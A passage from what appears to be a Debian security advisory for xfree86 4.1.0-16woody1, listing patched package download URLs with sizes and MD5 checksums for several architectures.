http://security.debian.org/pool/updates/main/x/xfree86/xspecs_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 4164958 3c984ffa27a444559d0ffae3a1802f14\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 164866 1589c2363e16ad5d51e9889a31989945\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 306128 56c6b42026e1146c4c3e133517f94e58\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 197878 96e0f225d467aa56cc74523144aa10b8\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 778272 757acf63b9140c8c3d8a616094010091\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 203204 de9c0dc495c42356b4d577c09a7ef7be\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 649012 b511d1bb8f602037d58f99453241f168\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 389956 2643d5a44baf3fe148fa99fa811c17e2\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 263568 f5d176e3b64c05ed31b36b6410b88edb\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 820138 ead43db05d1682dc1cd33c990a85b913\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 389850 8011f307a4d5cb0aa8bb7db530493772\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 78564 bc5b9adecfaa4cc78dd24cc3e88774b5\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 177350 1431799fc554aaea70c7026d2a5d570e\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 59834 68e917e3a99dc0ec98ecdfe5c0727f80\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 1990190 ffd857b488710539d35fd2364b3fb772\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 189472 05639af5c6bed73fb841cf59ae6e40bb\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 374388 3c6cdee84b2ecf885ed591af5a869149\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 84420 256b1ac71b1dce646cffda30704e170c\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 693842 710420c07d20c12ba50900d28a194e4d\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 4133954 97db3a5d0bfd5dc3991db39573fd5068\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 1489760 146d8cf832269d7e3d6f39a3fe5925c7\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa-dev_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 711612 115904a2a0f649d6f455e4561f474b5c\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 611030 1d9b81263c2eb48b733a9f6420cde676\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3-dbg_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 1603088 b234f6d424434758f7a777ce18ea5ce6\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 1372460 df00b6ff8d52de15ef15df761b63e2c1\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 4393618 49d74798e58e143dab843c8ad7ddc581\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 3225348 41fe5aff2fdfe51677cec138bfa51f73\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 84026 d3a486e3ad293e6819dc1250d573d30f\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 150362 6dcafb93fa6ac6e005ab34ec947199f0\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 1888098 892d99d5af5409c0504e14c8d63f3e94\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 1474552 8336ea711719c79772e3ecdcff85d872\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 219794 b20e366322272ac1abf24c905b7416c4\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 5719450 550c9f5113ddd3805a734c85a8758c09\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 524804 78830449f57a4cc482c2b29256148014\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 712538 f198be0721d0fefe3e80de9de8de12b9\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_alpha.deb\n Size/MD5 checksum: 2046538 41b18574ece3be00a57c8f2420e194cd\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 144700 345e837401ae1f48eabe0904aeac4ab0\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 252596 78c3eaeb69c0744df80a4ea7b82d5c2b\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 178530 43b2a9d746d9b7aa147a124004620a94\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 443948 b9f3e2d2d06b98d4f57dbf5f08c9fa3e\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 188344 011939c2d5c73132dc79eeb16184ec44\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 377520 47bff42e7d0896c535ecf886c51afbfb\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 348050 c3994a45c47f2679dc9255b78509f556\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 240318 a9e51c32915bc6c4779a43046cea7bae\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 490722 e10d565db8e49f9c1b8795f541dafb0c\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 347956 08d2176d6754817d50e96ae9bd4cece1\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 76032 e5de962649328611044720866a85afb3\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 168668 b93e3ef7e89883728176868f2b06a55f\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 59848 2d04ec15c027f7709f0396d28cba1282\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 1623866 25e9fe67b7f750055927f1bb08c0e3b4\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 175104 d719a073d23a85e0b6ea73b5ac3d431a\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 324422 3ff4ef758563163134c032e0b21540d7\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 81586 7455f6073d9385706a92016973e37ce0\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 606376 af0672909ca333192243bd99c66d8870\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 351610 de91181edf74112232ddc966afbc02a9\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 931808 16c6364cfd52a64e4c8565b5c28ec8fd\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 1314666 8344fd91b283a3180d8db171e9098fbc\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 2757110 86347d552e46d6588bffff6527891609\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 3091924 2ecfecaf4d1480f6719161f41b1c57a9\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 84070 cd1a99cea3618cc2df79d8417a59283e\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 132958 a4dd99b199475e87d45a7c6b9c244787\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 1655408 10d1a806b2428d178132e33149b56d9e\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 1339478 5b79e75ece1e0712cc28fb240f92ecc3\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 218956 565a64b431fd778ade91de79a11cdd47\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 4831874 7c5f4bfc08c1e716f61c5b0b4fa5ae51\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 494176 8f3d1fe933cd1eae269e82c36ded5bd9\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 620578 472603867d1421d01e6c692e767eb032\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_arm.deb\n Size/MD5 checksum: 1786420 635e9b4396a3a20f17db98337e91b685\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 131868 4e6a729ecedd2d792f545b95ef8808e2\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 229100 013b9f545a8bf7b4614b5ebfc00617db\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 167876 b9f7444698c022fdc76142fba2924a73\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 408864 bf7ba3cafc0c6029b2e5fd99875c792f\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 165824 d6eeae92cccce977c08a41322c9e2ae0\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 333700 c239af4fd8f9f46334b29c6238f4027e\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 292050 ff62c702b756263a3086ba61c8253fd5\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 212696 9531fd87f93ff956508e216137345d33\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 433272 d0c09cc477a275c1c2a4623aed08c55c\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 291924 8a6ae5427bd486a3742217b2baa8e704\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 75768 bb365449a41c50f4325cfbfa2d29d224\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 151086 6f58a0ce83eb1f08a6aa902bdd0a4bbc\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 59832 99de5573bd52e68023e1747f6099574b\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 1455808 ac5514563aa1be8ab2a50f1a845d5c87\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 170514 6013f8eb6e7c78aa7e1f7ff439852e7f\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 274984 210ddc3dbdc15329709b887e3f516ac0\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 80368 646d0ad46906cc7ab109949702b1d68f\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 552130 c345b869bda72ea9e81dedbe5c957b6a\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 3421956 bfe9428425b2867657328174d1038cc5\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 865318 bc4fcfed268ab378c4e611c51ab844eb\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa-dev_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 521954 8e1a132af4f7d8bf03e7c4aebe6f68ed\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 462062 0284e02b24c5bc1c6ea0619cdf3e3176\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3-dbg_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 963620 23b9e018dd3a2f3b57c0e9e25e083fcc\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 1223940 aa0cc49a4d7ba1967ca29c1ec1b786a1\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 2534236 51ec646bc89eeca7c3f727673958d051\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 2724850 28a3ead8c6cbcaa064f05daff4c1dd9f\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 72806 aeee0ddfff582183898337624a6e5a0f\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 123924 b77989c1a5314e8274d13821f1fea13b\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 1392972 328ea5d378d96e83323091822760a853\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 1122518 07ac6616cb6c84a11923a9bc94718dab\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 219050 9a99505ef78921269793dd75edc8cda2\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 4334876 805e2b2e2ae08edb479a7b5ee52f4823\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 483978 9ac9e1ef4cbed922661e69f4e5d2b068\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 601676 7f8dee0ac3974e55046f5ffc3396f184\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_i386.deb\n Size/MD5 checksum: 1495932 e0b2e685945a924a2c454518e9cb8765\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 191052 79823d7ec74e9b4120c2a26cec34d780\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 321506 b5c3dcdc87f282f517ed18d1b6a09262\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 240868 3ba4a3f5bf0d6575363cd77d7eeac165\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 824490 7f8129dd9a812ae380c11a772c40e02a\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 257462 de039254c0b162ec9347b1ed8ee8ce59\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 1166896 547186763b3370fc7da723a36aaad5e1\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 443612 3340375c091b952fa659a001c778c06c\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 339718 cf23cb9a8b1584f36f2aa20124194274\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 1333316 88b88ef01a767216f33b4ad7af8bcae2\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 443508 45468bc6469d2a9000eccfbea2bae74d\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 83312 c379fe38cd17a665819c6a88506f4068\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 207136 69ae84939b0d052efb2939a339ba6064\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 59836 062a0e576d0286cd38330550464c7b58\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 2409600 4f8519fe609780cda1036e867b9a99e4\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 210322 abcc2f3d14d6a59777a72091c0e9f864\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 472904 8ebd374a3fdc9229a4d2b529cbc66f25\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 90522 17ebcdf66c36b2b8a972e38f44a9278d\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 742964 47356a0370608644a49a20c44731bb2b\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 5184974 9dbf5b85af5dc5b787fc49a11a8e150d\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 2394146 58ce91432619dcea37f4bdea032662ee\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa-dev_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 831202 1710d9b86fe0ac1a8c2d8f066e298957\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 755344 e59ac8fff400c722f33da5e22f663e36\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3-dbg_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 3198822 564e9fb30c4ae252072c824ab99ef63d\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 1651928 fe029ff2145d14e6f5de6dd8cd58bf90\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 18060132 9c029ed22bdb90650064d6bb5ca836b1\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 3512430 306a9b2df41fe39bc3d3a552e1b8d1af\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 88644 2448ab3fc771fbb6bc0dfd17714029bb\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 169816 dfbe0d27616854586ab10a76fdbe7150\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 2369928 d234d286498d08fad843f5214fe03a51\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 1894400 ab19d6258158894b704bc1abe145a288\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 220980 3639dac0d5e21e7148f56409f62f58ec\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 6900550 44d66f86f743a7da5d0457de449ba446\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 566226 05635ac4c0026ad63f0cf90128daf92a\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 814896 e48c8276b5e880dbc6cca21fdd6527cd\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_ia64.deb\n Size/MD5 checksum: 2570950 ded41248f56a4aa50d8b162233d0914e\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/x/xfree86/lbxproxy_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 153970 282d3d56f5bb262ee43dd195c8c64ac3\n http://security.debian.org/pool/updates/main/x/xfree86/libdps-dev_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 277818 2ad015cf6fd0d61d3309f1597749b941\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 201844 106ce97413bd06905d08343772ed81bb\n http://security.debian.org/pool/updates/main/x/xfree86/libdps1-dbg_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 488336 09fc528826e2a43f81b9c81f25247490\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 203396 ff63d2458d9d2be8a6730b0e63254e9d\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dbg_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 397250 f143cc3ffdd65f980cc0e1f8b46b5b74\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw6-dev_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 357932 57b67b20bc31be5adfb2777c2814493c\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 263802 526ae9aeb9eff5d3b44a8b524da28afd\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 516890 87e2d9ba2f01b5ff025e2abe5a20ebc0\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 357810 f55c9ab6e9dd0ba084019919d9dd2aa1\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 77990 f7a8a2ea68081a58faca3451df7f6b5c\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 171862 a7443c9db94d3e537cf68f00f6426e84\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 59828 541a95464444759a8441ac8ea8b434f0\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 1699284 2a8039d220647328f6a983b50b707e0e\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 180434 11d9a2e4538b54897bb13a047af9b78c\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 337770 89756d38d2524a1e360546f1b2e59e94\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 83002 ca058399ba6a124f813ce75fe9a48f8c\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 680980 704a1ef0f5f54821bbe997cb43681eba\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 434142 9fe8e70f6cfdc53f35e9d1ac41138d9d\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 995116 d262b4f194f76355e4c3aa53feb19b52\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 1456222 3609976a0b3facbab8b9f338a5f5360b\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 2977164 22afbf53fba3442713d17ee8b63588c4\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 3191114 88a304ccb8f96f21593043ae907b4bdb\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 80530 08bc4cd00ad008c6362b2cdcfacc01f4\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 137256 6b5a563ef922d653aa1e9e7b541bca9b\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 1923244 5730d34a84e93760933ccdb14a226579\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 1498606 511f15524b42ef50b311217f817a1691\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 219536 94b448d2443ca9e37f90600ea4b6ab09\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 3591730 f028df776b92cf7939f92c69bcbdba33\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 509590 4b1513550084710c18b810ba738b204b\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 664394 70ff31e23438f40bbc882415daab2b8a\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_hppa.deb\n Size/MD5 checksum: 2069434 